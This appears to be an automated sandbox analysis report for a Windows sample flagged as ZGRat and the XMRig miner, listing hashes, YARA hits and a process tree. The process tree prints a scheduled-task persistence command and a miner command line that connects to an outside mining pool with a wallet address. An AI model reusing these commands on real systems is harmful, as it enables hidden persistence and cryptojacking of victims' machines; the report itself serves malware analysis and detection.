Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-en -
resource tags
arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system -
submitted
25/02/2024, 12:17
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20240221-en
General
-
Target
tmp.exe
-
Size
5.0MB
-
MD5
a3fb2b623f4490ae1979fea68cfe36d6
-
SHA1
34bec167e0f95ecc36761f77c93c1229c2c5d1f4
-
SHA256
3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
-
SHA512
370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912
-
SSDEEP
98304:xrd0tlZ+I89l7cGcGI4G/Mul2rq/aReDkizMeQUz4:x+tlQ4zGk/Mul2rVe4iwVU
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
resource yara_rule behavioral2/memory/4072-0-0x00000000006D0000-0x0000000000BD4000-memory.dmp family_zgrat_v1 behavioral2/files/0x00060000000231ea-11.dat family_zgrat_v1 behavioral2/files/0x00060000000231ea-13.dat family_zgrat_v1 behavioral2/files/0x00060000000231ea-42.dat family_zgrat_v1 -
XMRig Miner payload 14 IoCs
resource yara_rule behavioral2/memory/1812-22-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-23-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-25-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-26-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-27-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-28-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-29-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-30-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-31-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-33-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-34-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1812-39-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation .exe Key value queried \REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation .exe -
Executes dropped EXE 2 IoCs
pid Process 4140 .exe 2292 .exe -
resource yara_rule behavioral2/memory/1812-17-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-19-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-20-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-22-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-25-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-26-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-30-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-31-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-33-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-34-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1812-39-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4140 set thread context of 1812 4140 .exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2008 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1972 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4140 .exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4072 tmp.exe Token: SeDebugPrivilege 4140 .exe Token: SeLockMemoryPrivilege 1812 vbc.exe Token: SeLockMemoryPrivilege 1812 vbc.exe Token: SeDebugPrivilege 2292 .exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1812 vbc.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 4072 wrote to memory of 3132 4072 tmp.exe 87 PID 4072 wrote to memory of 3132 4072 tmp.exe 87 PID 3132 wrote to memory of 1972 3132 cmd.exe 89 PID 3132 wrote to memory of 1972 3132 cmd.exe 89 PID 3132 wrote to memory of 4140 3132 cmd.exe 93 PID 3132 wrote to memory of 4140 3132 cmd.exe 93 PID 4140 wrote to memory of 5052 4140 .exe 94 PID 4140 wrote to memory of 5052 4140 .exe 94 PID 5052 wrote to memory of 2008 5052 cmd.exe 96 PID 5052 wrote to memory of 2008 5052 cmd.exe 96 PID 4140 wrote to memory of 1812 4140 .exe 98 PID 4140 wrote to memory of 1812 4140 .exe 98 PID 4140 wrote to memory of 1812 4140 .exe 98 PID 4140 wrote to memory of 1812 4140 .exe 98 PID 4140 wrote to memory of 1812 4140 .exe 98 PID 4140 wrote to memory of 1812 4140 .exe 98 PID 4140 wrote to memory of 1812 4140 .exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp703E.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1972
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
PID:2008
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1812
-
-
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2292
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD5854f9f20b25336474553f4ce2733caec
SHA1837f38af4e9e8fc332cea859418bb285e5a0bb1a
SHA256face22c2af1faf6f4ebd51d1aaea620f0b57c97d5c3d39ff1604dc7fdf596958
SHA512ccb7a27d8095b282b11b2c67eb79412550a8ef1bb12449b2a95d690f6b8998260008d89e3bb7ac27e79f45f5832176b1713a5bd8414b5ce8782ab4dd737b8008
-
Filesize
3.2MB
MD59e869a28e5111622ec67f6a0d37b8dcd
SHA18567b459eca972bc20a06829041866c7b833cb1a
SHA2560edafb0467dfca99cea9a89b247107215e14a990a117a04a3df844692f9993cc
SHA512111cf59f71884849699e9f56af2daf060a4beb82e97468ad108b8655a1d0f946b017e8f6c514e8ecb7dc12fd2d57e2af577d332dac1918f668814e9d0ed38dd0
-
Filesize
5.0MB
MD5a3fb2b623f4490ae1979fea68cfe36d6
SHA134bec167e0f95ecc36761f77c93c1229c2c5d1f4
SHA2563bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
SHA512370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912
-
Filesize
1KB
MD5e3da8eae01f57153845d1533b6bed268
SHA1a235712a631c52d2853e9136d9c4431358f34fd2
SHA25677507c05c8131f73d1dd1500992223819a6ab09cd820716e00bf907c9c7fc857
SHA512b24b1064f8270981746f49a1b56a1aab21f7985af672bc6dcdbd67e498033714131ba4581c9c3d934e86b56d904bb0ecf322fae498133bbb9cb3a68ea6cad9d5
-
Filesize
168B
MD5ed5bec68f6041492c40424e70708ead4
SHA1ae3c0f44294c740d8a97c2e2bdd7cc510e2fc8bd
SHA256cdeb80d648a24656cabd3ba42b5be3f1c42bd9eb27351edab90c34b27e3bac7a
SHA512ca432d7de3b91b20df9d41fc2ad8cde5034ba1d0caef2e504b873481eb69adeb064074257615924f44dd81be2c9bd1c81012d95b122fb62ec0ef4bb5db3f15af